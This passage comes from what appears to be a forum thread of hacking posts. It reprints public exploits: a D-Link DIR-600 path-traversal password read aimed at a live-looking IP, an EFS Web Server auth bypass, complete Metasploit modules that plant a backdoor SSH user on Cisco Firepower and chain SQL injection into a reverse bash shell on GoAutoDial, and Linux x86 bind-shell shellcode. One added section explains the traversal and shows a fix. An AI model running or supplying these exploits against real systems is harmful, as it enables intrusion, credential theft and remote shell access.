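    print("fixed handler leaks:     ", leaks_admin_content(admin_index_fixed))
```

A browser hides the bug because it never shows the body of a 302, which is why the PoC needs the No-Redirect rule; `check_live` does the same with urllib by refusing the redirect and inspecting the response that came with it.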
  17. Anonyali

    Hacking

    # Exploit Title: D-Link DIR-600 - Authentication Bypass (Absolute Path Traversal Attack)
    # CVE - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12943
    # Date: 29-08-2017
    # Exploit Author: Jithin D Kurup
    # Contact : https://in.linkedin.com/in/jithin-d-kurup-77b616142
    # Vendor : www.dlink.com
    # Version: Hardware version: B1 Firmware version: 2.01
    # Tested on: All Platforms

    1) Description

    After successfully connecting to a D-Link DIR-600 router (firmware version 2.01), any user can easily bypass the router's admin panel just by adding a simple payload to the URL.
    D-Link DIR-600 Rev Bx devices with v2.x firmware allow remote attackers to read passwords via a model/__show_info.php?REQUIRE_FILE= absolute path traversal attack, as demonstrated by discovering the admin password.
    It is more dangerous when your router has a public IP with remote login enabled.

    IN MY CASE, Tested Router IP : http://190.164.170.249
    Video POC : https://www.youtube.com/watch?v=PeNOJORAQsQ

    2) Proof of Concept

    Step 1: Go to the router login page : http://190.164.170.249:8080
    Step 2: Add the payload to the URL.
    Payload: model/__show_info.php?REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd

    Bingooo. You got admin access on the router. Now you can download/upload settings, change settings etc.

    ---------------Greetz----------------
    +++++++++++ www.0seccon.com ++++++++++++
    Saran, Dhani, Gem, Vignesh, Hemanth, Sudin, Vijith
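The `REQUIRE_FILE=%2Fvar%2Fetc%2Fhttpasswd` payload in the post above is an absolute path traversal: the script opens whatever path it is handed, so an absolute path ignores the web root entirely and `../` sequences would escape it just as well. The following added example (my own code, not the DIR-600 firmware and not the poster's) shows the include pattern that produces the bug next to a version that resolves the requested name under the web root and refuses anything that lands outside it. It builds a throwaway directory tree to stand in for the router's filesystem; the file names, the `httpasswd` contents and the function names are constructed for the demonstration.

```python
import os
import tempfile


def vulnerable_require(require_file, webroot):
    """Mirrors REQUIRE_FILE=<path>: the value is opened as given.
    An absolute value never touches webroot; a relative one may walk out of it."""
    path = require_file if os.path.isabs(require_file) else os.path.join(webroot, require_file)
    with open(path) as f:
        return f.read()


def safe_require(require_file, webroot):
    """Resolve the request under webroot and reject anything that escapes it.
    realpath() also collapses symlinks, so a link out of the tree is caught too."""
    base = os.path.realpath(webroot)
    # join() discards base when require_file is absolute, so the check below must
    # compare the resolved target against base rather than trust the join.
    target = os.path.realpath(os.path.join(base, require_file))
    if os.path.commonpath([base, target]) != base:
        raise PermissionError("path escapes webroot: %r" % require_file)
    with open(target) as f:
        return f.read()


def demo():
    """Constructed tree: <tmp>/www holds one page, <tmp>/httpasswd stands in for
    /var/etc/httpasswd. Returns the outcomes keyed by request, plus the secret path."""
    root = tempfile.mkdtemp()
    webroot = os.path.join(root, "www")
    os.makedirs(webroot)
    secret = os.path.join(root, "httpasswd")
    with open(os.path.join(webroot, "page.htm"), "w") as f:
        f.write("page")
    with open(secret, "w") as f:
        f.write("admin:password123")   # constructed, not a real credential

    results = {}
    results["vuln_abs"] = vulnerable_require(secret, webroot)        # absolute traversal
    results["vuln_rel"] = vulnerable_require("../httpasswd", webroot)  # relative traversal
    results["safe_ok"] = safe_require("page.htm", webroot)           # legitimate include
    for request in (secret, "../httpasswd"):
        try:
            safe_require(request, webroot)
            results[request] = "allowed"
        except PermissionError:
            results[request] = "blocked"
    return results, secret


if __name__ == "__main__":
    outcome, secret_path = demo()
    for k, v in outcome.items():
        print("%-40s -> %s" % (k, v))
```

The fix is the comparison after `realpath()`, not input filtering: stripping `../` or rejecting a leading `/` can be bypassed with encodings and symlinks, whereas checking the resolved path's prefix against the resolved web root holds regardless of how the name was spelled.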
  18. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    require 'msf/core'

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient
      include Msf::Exploit::CmdStager
      include Msf::Exploit::Remote::SSH

      def initialize(info={})
        super(update_info(info,
          'Name'           => "Cisco Firepower Management Console 6.0 Post Authentication UserAdd Vulnerability",
          'Description'    => %q{
            This module exploits a vulnerability found in Cisco Firepower Management Console.
            The management system contains a configuration flaw that allows the www user to
            execute the useradd binary, which can be abused to create backdoor accounts.
            Authentication is required to exploit this vulnerability.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Matt',   # Original discovery & PoC
              'sinn3r'  # Metasploit module
            ],
          'References'     =>
            [
              [ 'CVE', '2016-6433' ],
              [ 'URL', 'https://blog.korelogic.com/blog/2016/10/10/virtual_appliance_spelunking' ]
            ],
          'Platform'       => 'linux',
          'Arch'           => ARCH_X86,
          'Targets'        =>
            [
              [ 'Cisco Firepower Management Console 6.0.1 (build 1213)', {} ]
            ],
          'Privileged'     => false,
          'DisclosureDate' => 'Oct 10 2016',
          'CmdStagerFlavor'=> %w{ echo },
          'DefaultOptions' =>
            {
              'SSL'        => 'true',
              'SSLVersion' => 'Auto',
              'RPORT'      => 443
            },
          'DefaultTarget'  => 0))

        register_options(
          [
            # admin:Admin123 is the default credential for 6.0.1
            OptString.new('USERNAME', [true, 'Username for Cisco Firepower Management console', 'admin']),
            OptString.new('PASSWORD', [true, 'Password for Cisco Firepower Management console', 'Admin123']),
            OptString.new('NEWSSHUSER', [false, 'New backdoor username (Default: Random)']),
            OptString.new('NEWSSHPASS', [false, 'New backdoor password (Default: Random)']),
            OptString.new('TARGETURI', [true, 'The base path to Cisco Firepower Management console', '/']),
            OptInt.new('SSHPORT', [true, 'Cisco Firepower Management console\'s SSH port', 22])
          ], self.class)
      end

      def check
        # For this exploit to work, we need to check two services:
        # * HTTP - To create the backdoor account for SSH
        # * SSH  - To execute our payload
        vprint_status('Checking Cisco Firepower Management console...')
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => normalize_uri(target_uri.path, '/img/favicon.png?v=6.0.1-1213')
        })

        if res && res.code == 200
          vprint_status("Console is found.")
          vprint_status("Checking SSH service.")
          begin
            ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
              Net::SSH.start(rhost, 'admin',
                port: datastore['SSHPORT'],
                password: Rex::Text.rand_text_alpha(5),
                auth_methods: ['password'],
                non_interactive: true
              )
            end
          rescue Timeout::Error
            vprint_error('The SSH connection timed out.')
            return Exploit::CheckCode::Unknown
          rescue Net::SSH::AuthenticationFailed
            # Hey, it talked. So that means SSH is running.
            return Exploit::CheckCode::Appears
          rescue Net::SSH::Exception => e
            vprint_error(e.message)
          end
        end

        Exploit::CheckCode::Safe
      end

      def get_sf_action_id(sid)
        print_status('Attempting to obtain sf_action_id from rulesimport.cgi')

        uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
        res = send_request_cgi({
          'method' => 'GET',
          'uri'    => uri,
          'cookie' => "CGISESSID=#{sid}"
        })

        unless res
          fail_with(Failure::Unknown, 'Failed to obtain rules import requirements.')
        end

        sf_action_id = res.body.scan(/sf_action_id = '(.+)';/).flatten[1]

        unless sf_action_id
          fail_with(Failure::Unknown, 'Unable to obtain sf_action_id from rulesimport.cgi')
        end

        sf_action_id
      end

      def create_ssh_backdoor(sid, user, pass)
        uri = normalize_uri(target_uri.path, 'DetectionPolicy/rules/rulesimport.cgi')
        sf_action_id = get_sf_action_id(sid)
        sh_name = 'exploit.sh'

        print_status("Attempting to create an SSH backdoor as #{user}:#{pass}")

        mime_data = Rex::MIME::Message.new
        mime_data.add_part('Import', nil, nil, 'form-data; name="action_submit"')
        mime_data.add_part('file', nil, nil, 'form-data; name="source"')
        mime_data.add_part('1', nil, nil, 'form-data; name="manual_update"')
        mime_data.add_part(sf_action_id, nil, nil, 'form-data; name="sf_action_id"')
        mime_data.add_part(
          "sudo useradd -g ldapgroup -p `openssl passwd -1 #{pass}` #{user}; rm /var/sf/SRU/#{sh_name}",
          'application/octet-stream',
          nil,
          "form-data; name=\"file\"; filename=\"#{sh_name}\""
        )

        send_request_cgi({
          'method'   => 'POST',
          'uri'      => uri,
          'cookie'   => "CGISESSID=#{sid}",
          'ctype'    => "multipart/form-data; boundary=#{mime_data.bound}",
          'data'     => mime_data.to_s,
          'vars_get' => { 'no_mojo' => '1' },
        })
      end

      def generate_new_username
        datastore['NEWSSHUSER'] || Rex::Text.rand_text_alpha(5)
      end

      def generate_new_password
        datastore['NEWSSHPASS'] || Rex::Text.rand_text_alpha(5)
      end

      def report_cred(opts)
        service_data = {
          address: rhost,
          port: rport,
          service_name: 'cisco',
          protocol: 'tcp',
          workspace_id: myworkspace_id
        }

        credential_data = {
          origin_type: :service,
          module_fullname: fullname,
          username: opts[:username],   # do_login passes the key as :username
          private_data: opts[:password],
          private_type: :password
        }.merge(service_data)

        login_data = {
          last_attempted_at: DateTime.now,
          core: create_credential(credential_data),
          status: Metasploit::Model::Login::Status::SUCCESSFUL,
          proof: opts[:proof]
        }.merge(service_data)

        create_credential_login(login_data)
      end

      def do_login
        console_user = datastore['USERNAME']
        console_pass = datastore['PASSWORD']
        uri          = normalize_uri(target_uri.path, 'login.cgi')

        print_status("Attempting to login in as #{console_user}:#{console_pass}")
        res = send_request_cgi({
          'method'    => 'POST',
          'uri'       => uri,
          'vars_post' => {
            'username' => console_user,
            'password' => console_pass,
            'target'   => ''
          }
        })

        unless res
          fail_with(Failure::Unknown, 'Connection timed out while trying to log in.')
        end

        res_cookie = res.get_cookies
        if res.code == 302 && res_cookie.include?('CGISESSID')
          cgi_sid = res_cookie.scan(/CGISESSID=(\w+);/).flatten.first
          print_status("CGI Session ID: #{cgi_sid}")
          print_good("Authenticated as #{console_user}:#{console_pass}")
          report_cred(username: console_user, password: console_pass)
          return cgi_sid
        end

        nil
      end

      def execute_command(cmd, opts = {})
        @first_exec = true
        cmd.gsub!(/\/tmp/, '/usr/tmp')

        # Weird hack for the cmd stager.
        # Because it keeps using > to write the payload.
        if @first_exec
          @first_exec = false
        else
          cmd.gsub!(/>>/, ' > ')
        end

        begin
          Timeout.timeout(3) do
            @ssh_socket.exec!("#{cmd}\n")
            vprint_status("Executing #{cmd}")
          end
        rescue Timeout::Error
          fail_with(Failure::Unknown, 'SSH command timed out')
        rescue Net::SSH::ChannelOpenFailed
          print_status('Trying again due to Net::SSH::ChannelOpenFailed (sometimes this happens)')
          retry
        end
      end

      def init_ssh_session(user, pass)
        print_status("Attempting to log into SSH as #{user}:#{pass}")

        factory = ssh_socket_factory
        opts = {
          auth_methods:    ['password', 'keyboard-interactive'],
          port:            datastore['SSHPORT'],
          use_agent:       false,
          config:          false,
          password:        pass,
          proxy:           factory,
          non_interactive: true
        }

        opts.merge!(verbose: :debug) if datastore['SSH_DEBUG']

        begin
          ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
            @ssh_socket = Net::SSH.start(rhost, user, opts)
          end
        rescue Net::SSH::Exception => e
          fail_with(Failure::Unknown, e.message)
        end
      end

      def exploit
        # To exploit the useradd vuln, we need to login first.
        sid = do_login
        return unless sid

        # After login, we can call the useradd utility to create a backdoor user
        new_user = generate_new_username
        new_pass = generate_new_password
        create_ssh_backdoor(sid, new_user, new_pass)

        # Log into the SSH backdoor account
        init_ssh_session(new_user, new_pass)

        begin
          execute_cmdstager({:linemax => 500})
        ensure
          @ssh_socket.close
        end
      end
    end
  19. Moeein Seven

    Hacking

    # Exploit Title: EFS Web Server 7.2 Authentication Bypass
    # Date: 11-06-2017
    # Software Link: http://www.sharing-file.com/efssetup.exe
    # Software Version : 7.2
    # Exploit Author: Touhid M.Shaikh
    # Contact: http://twitter.com/touhidshaikh22
    # Website: http://touhidshaikh.com/

    ######## Description ########

    What is Easy File Sharing Web Server 7.2 ?
    Easy File Sharing Web Server is a file sharing software that allows visitors to upload/download files easily through a web browser. It can help you share files with your friends and colleagues. They can download files from your computer or upload files from theirs. They will not be required to install this software or any other software because an internet browser is enough. Easy File Sharing Web Server also provides a Bulletin Board System (Forum). It allows remote users to post messages and files to the forum. The Secure Edition adds support for SSL encryption that helps protect businesses against site spoofing and data corruption.

    ######## Video PoC and Article ########

    https://www.youtube.com/watch?v=XlTH7Fm1m1w
    http://touhidshaikh.com/blog/poc/EFSwebservr-authbypass/

    ######## Attack Description ########

    Note: No need to login... because this is an auth bypass vulnerability. hehehe.

    ==>START<==
    Any visitor can bypass the login screen by just changing the URL and browsing the drives. bingoo...

    ######## Proof of Concept ########

    When we visit the EFS web server it prompts for login; now the attacker just changes the URL to the one below.

    Exploit....
    http://192.168.1.14/disk_c/

    In this case, change the drive by just changing /disk_c to /disk_<Drive letter>, for example /disk_d , /disk_f etc.

    =============================================
    NOTE :: Now we have permission to view drives and folders and download files in different drives or folders.
    ============================================
  20. ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##

    class MetasploitModule < Msf::Exploit::Remote
      Rank = ExcellentRanking

      include Msf::Exploit::Remote::HttpClient

      def initialize(info={})
        super(update_info(info,
          'Name'           => "GoAutoDial 3.3 Authentication Bypass / Command Injection",
          'Description'    => %q{
            This module exploits a SQL injection flaw in the login functionality for GoAutoDial
            version 3.3-1406088000 and below, and attempts to perform command injection. This also
            attempts to retrieve the admin user details, including the cleartext password stored in
            the underlying database. Command injection will be performed with root privileges. The
            default pre-packaged ISO builds are available from goautodial.org. Currently, the
            hardcoded command injection payload is an encoded reverse-tcp bash one-liner and the
            handler should be setup to receive it appropriately.
          },
          'License'        => MSF_LICENSE,
          'Author'         =>
            [
              'Chris McCurley', # Discovery & Metasploit module
            ],
          'References'     =>
            [
              ['CVE', '2015-2843'],
              ['CVE', '2015-2845']
            ],
          'Platform'       => %w{unix},
          'Arch'           => ARCH_CMD,
          'Targets'        =>
            [
              ['Automatic', {} ]
            ],
          'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' },
          'DefaultTarget'  => 0,
          'Privileged'     => false,
          'DisclosureDate' => 'Apr 21 2015'))

        register_options(
          [
            OptPort.new('RPORT', [true, 'The target port', 443]),
            OptBool.new('SSL', [false, 'Use SSL', true]),
            OptString.new('TARGETURI', [true, 'The base path', '/'])
          ])
      end

      def check
        res = check_version()
        if res and res.body =~ /1421902800/
          return Exploit::CheckCode::Safe
        else
          return Exploit::CheckCode::Vulnerable
        end
      end

      def check_version()
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'GET',
          'uri'     => normalize_uri(uri, 'changelog.txt'),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity'
          }
        })
      end

      def sqli_auth_bypass()
        uri = target_uri.path
        send_request_cgi({
          'method'    => 'POST',
          'uri'       => normalize_uri(uri, 'index.php', 'go_login', 'validate_credentials'),
          'headers'   => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity'
          },
          'vars_post' => {
            'user_name' => 'admin',
            'user_pass' => '\'%20or%20\'1\'%3D\'1'
          }
        })
      end

      def sqli_admin_pass(cookies)
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'GET',
          'uri'     => normalize_uri(uri, 'index.php', 'go_site', 'go_get_user_info', '\'%20OR%20active=\'Y'),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity',
            'Cookie'          => cookies
          }
        })
      end

      #
      # Run the actual exploit
      #
      def execute_command()
        encoded = Rex::Text.encode_base64("#{payload.encoded}")
        params  = "||%20bash%20-c%20\"eval%20`echo%20-n%20" + encoded + "%20|%20base64%20--decode`\""
        uri = target_uri.path
        send_request_cgi({
          'method'  => 'GET',
          'uri'     => normalize_uri(uri, 'index.php', 'go_site', 'cpanel', params),
          'headers' => {
            'User-Agent'      => 'Mozilla/5.0',
            'Accept-Encoding' => 'identity',
            'Cookie'          => @cookie
          }
        })
      end

      def exploit()
        print_status("#{rhost}:#{rport} - Trying SQL injection...")
        res1 = sqli_auth_bypass()
        if res1 && res1.code == 200
          print_good('Authentication Bypass (SQLi) was successful')
        else
          print_error('Error: Run \'check\' command to identify whether the auth bypass has been fixed')
          # No usable response, so there is no session cookie to continue with.
          return
        end

        @cookie = res1.get_cookies

        print_status("#{rhost}:#{rport} - Dumping admin password...")
        res = sqli_admin_pass(@cookie)
        if res
          print_good(res.body)
        else
          print_error('Error: No creds returned, possible mitigations are in place.')
        end

        print_status("#{rhost}:#{rport} - Sending payload...waiting for connection")
        execute_command()
      end
    end
  21. /*
     * linux-x86-authportbind.c - AUTH portbind shellcode 166 bytes for Linux/x86
     * Copyright (c) 2006 Gotfault Security <xgc@gotfault.net>
     *
     * portbind shellcode that bind()'s a shell on port 64713/tcp
     * and requests a user password.
     *
     */

    #include <stdio.h>
    #include <string.h>

    char shellcode[] =
        /* socket(AF_INET, SOCK_STREAM, 0) */
        "\x6a\x66"              // push $0x66
        "\x58"                  // pop %eax
        "\x6a\x01"              // push $0x1
        "\x5b"                  // pop %ebx
        "\x99"                  // cltd
        "\x52"                  // push %edx
        "\x53"                  // push %ebx
        "\x6a\x02"              // push $0x2
        "\x89\xe1"              // mov %esp,%ecx
        "\xcd\x80"              // int $0x80
        /* bind(s, server, sizeof(server)) */
        "\x52"                  // push %edx
        "\x66\x68\xfc\xc9"      // pushw $0xc9fc   // PORT = 64713
        "\x66\x6a\x02"          // pushw $0x2
        "\x89\xe1"              // mov %esp,%ecx
        "\x6a\x10"              // push $0x10
        "\x51"                  // push %ecx
        "\x50"                  // push %eax
        "\x89\xe1"              // mov %esp,%ecx
        "\x89\xc6"              // mov %eax,%esi
        "\x43"                  // inc %ebx
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        /* listen(s, anything) */
        "\xb0\x66"              // mov $0x66,%al
        "\xd1\xe3"              // shl %ebx
        "\xcd\x80"              // int $0x80
        /* accept(s, 0, 0) */
        "\x52"                  // push %edx
        "\x52"                  // push %edx
        "\x56"                  // push %esi
        "\x89\xe1"              // mov %esp,%ecx
        "\x43"                  // inc %ebx
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        "\x96"                  // xchg %eax,%esi
        /* send(s, "Password: ", 0x0a, flags) */
        "\x52"                  // push %edx
        "\x68\x72\x64\x3a\x20"  // push $0x203a6472
        "\x68\x73\x73\x77\x6f"  // push $0x6f777373
        "\x66\x68\x50\x61"      // pushw $0x6150
        "\x89\xe7"              // mov %esp,%edi
        "\x6a\x0a"              // push $0xa
        "\x57"                  // push %edi
        "\x56"                  // push %esi
        "\x89\xe1"              // mov %esp,%ecx
        "\xb3\x09"              // mov $0x9,%bl
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        /* recv(s, *buf, 0x08, flags) */
        "\x52"                  // push %edx
        "\x6a\x08"              // push $0x8
        "\x8d\x4c\x24\x08"      // lea 0x8(%esp),%ecx
        "\x51"                  // push %ecx
        "\x56"                  // push %esi
        "\x89\xe1"              // mov %esp,%ecx
        "\xb3\x0a"              // mov $0xa,%bl
        "\xb0\x66"              // mov $0x66,%al
        "\xcd\x80"              // int $0x80
        "\x87\xf3"              // xchg %esi,%ebx
        /* like: strncmp(string1, string2, 0x8) */
        "\x52"                  // push %edx
        "\x68\x61\x75\x6c\x74"  // push $0x746c7561   // password
        "\x68\x67\x6f\x74\x66"  // push $0x66746f67   // here
        "\x89\xe7"              // mov %esp,%edi
        "\x8d\x74\x24\x1c"      // lea 0x1c(%esp),%esi
        "\x89\xd1"              // mov %edx,%ecx
        "\x80\xc1\x08"          // add $0x8,%cl
        "\xfc"                  // cld
        "\xf3\xa6"              // repz cmpsb %es:(%edi),%ds:(%esi)
        "\x74\x04"              // je dup
        /* exit(something) */
        "\xf7\xf0"              // div %eax
        "\xcd\x80"              // int $0x80
        /* dup2(c, 2) , dup2(c, 1) , dup2(c, 0) */
        "\x6a\x02"              // push $0x2
        "\x59"                  // pop %ecx
        "\xb0\x3f"              // mov $0x3f,%al
        "\xcd\x80"              // int $0x80
        "\x49"                  // dec %ecx
        "\x79\xf9"              // jns dup_loop
        /* execve("/bin/sh", ["/bin/sh"], NULL) */
        "\x6a\x0b"              // push $0xb
        "\x58"                  // pop %eax
        "\x52"                  // push %edx
        "\x68\x2f\x2f\x73\x68"  // push $0x68732f2f
        "\x68\x2f\x62\x69\x6e"  // push $0x6e69622f
        "\x89\xe3"              // mov %esp,%ebx
        "\x52"                  // push %edx
        "\x53"                  // push %ebx
        "\x89\xe1"              // mov %esp,%ecx
        "\xcd\x80";             // int $0x80

    int main()
    {
        int (*f)() = (int(*)())shellcode;
        printf("Length: %u\n", (unsigned)strlen(shellcode));
        f();
    }